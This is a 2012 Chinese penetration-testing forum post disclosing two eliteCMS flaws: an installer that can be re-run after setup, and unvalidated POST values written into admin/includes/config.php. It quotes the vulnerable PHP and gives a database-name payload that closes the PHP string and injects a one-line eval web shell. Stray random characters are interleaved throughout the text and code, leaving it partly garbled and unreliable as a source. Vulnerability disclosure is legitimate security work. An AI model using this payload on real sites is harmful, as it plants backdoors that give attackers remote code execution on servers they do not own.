中国网络渗透测试联盟

标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞 [打印本页]
作者: admin    时间: 2012-11-18 13:59
标题: eliteCMS安装文件未验证 + 一句话写入安全漏洞
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
  {  U3 C" X) O& U' |- a2 K8 Z6 \0 R$ K: a7 N2 b  y# b
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php0 m) k; f, D6 B
我们来看代码:3 ?; f! v# q  L2 d
* }  d6 o- N/ S) g5 ^- J. T0 c* r" l
...' o0 A' N& N+ W) e! u$ e
elseif ($_GET['step'] == "4") {* F5 c. C- c+ J
    $file = "../admin/includes/config.php";
7 A8 K* J) F( S8 W9 ]) Y0 P    $write = "<?php\n";2 L! K. R: Y6 b. l2 F& ?$ m
    $write .= "/**\n";" J  k7 B* ^! V# Y8 o. {# C) ^# a
    $write .= "*\n";5 t5 D3 v: E5 v' S# a( T6 V* C
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";9 o0 t, m. ?! E" G, `. }7 A
...略...
7 }# w/ J! E4 U$ g    $write .= "*\n";
" K* N/ H7 ?  V6 B  J8 k8 T8 Q3 _    $write .= "*/\n";
7 X. [: d$ Z; ^$ f1 q2 y    $write .= "\n";
' j+ `: }2 q9 }$ k3 `' E* U    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
* Y; @/ Z% T! D$ O5 k: N% X; j1 u' n6 [: Q    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
7 X7 z: i6 t* k. {) L. h# F    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
4 @, s5 w* M) e& O2 S    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 K" r* A. h6 t$ F& q    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
! X* W0 O9 F$ ~8 X& ^/ v; X    $write .= "if (!\$connection) {\n";
& B3 [5 c' ^9 n; @    $write .= "        die(\"Database connection failed\" .mysql_error());\n";. K5 `: v/ I$ c, r* D1 d. H/ [
    $write .= "        \n";0 {+ W3 |& W0 A5 q( J0 f# l
    $write .= "} \n";3 y0 Y) A; c4 e1 t. R
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";6 {8 @7 z: s7 `* k9 ?7 _
    $write .= "if (!\$db_select) {\n";# J; {6 s: D! T
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
7 j% t- w0 H$ S* ~0 x7 \' {( ?    $write .= "        \n";+ U/ G+ B8 s3 v* m6 T+ K2 ?* p/ P
    $write .= "} \n";+ l/ ^. v2 N# X8 l5 ^
    $write .= "?>\n";
4 s4 w9 O, E; o1 Y6 z
' e6 S( O! I  i6 {! F  C    $writer = fopen($file, 'w');
: {# J% u! D# |9 k...% O" B* T1 H& C
$ Z0 l0 h& k4 b1 I* n* m6 s  q
在看代码:% o$ _  E/ j/ F4 g0 f, c/ j; j3 ~
9 U+ [+ |4 u6 n+ b% {& ~
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
" ~, L& Z+ R8 V5 K$_SESSION['DB_NAME'] = $_POST['DB_NAME'];& m: G) H. J# v, Z+ C
$_SESSION['DB_USER'] = $_POST['DB_USER'];9 [( X& W/ l( r% g' ~
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
0 U: {+ w: m$ d$ r. O9 l6 d' o ! g; S, S; l+ {5 B
取值未作任何验证1 r& d2 g: v( ]# ~5 W5 w
如果将数据库名POST数据:. t9 {1 h! F9 l! H
- }* F/ J0 I! `) x, V
"?><?php eval($_POST[c]);?><?php
7 J0 N6 C- @7 L1 U: h0 l
0 t  B3 H) T: K将导致一句话后门写入/admin/includes/config.php
) c6 |( ?! Z) \



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2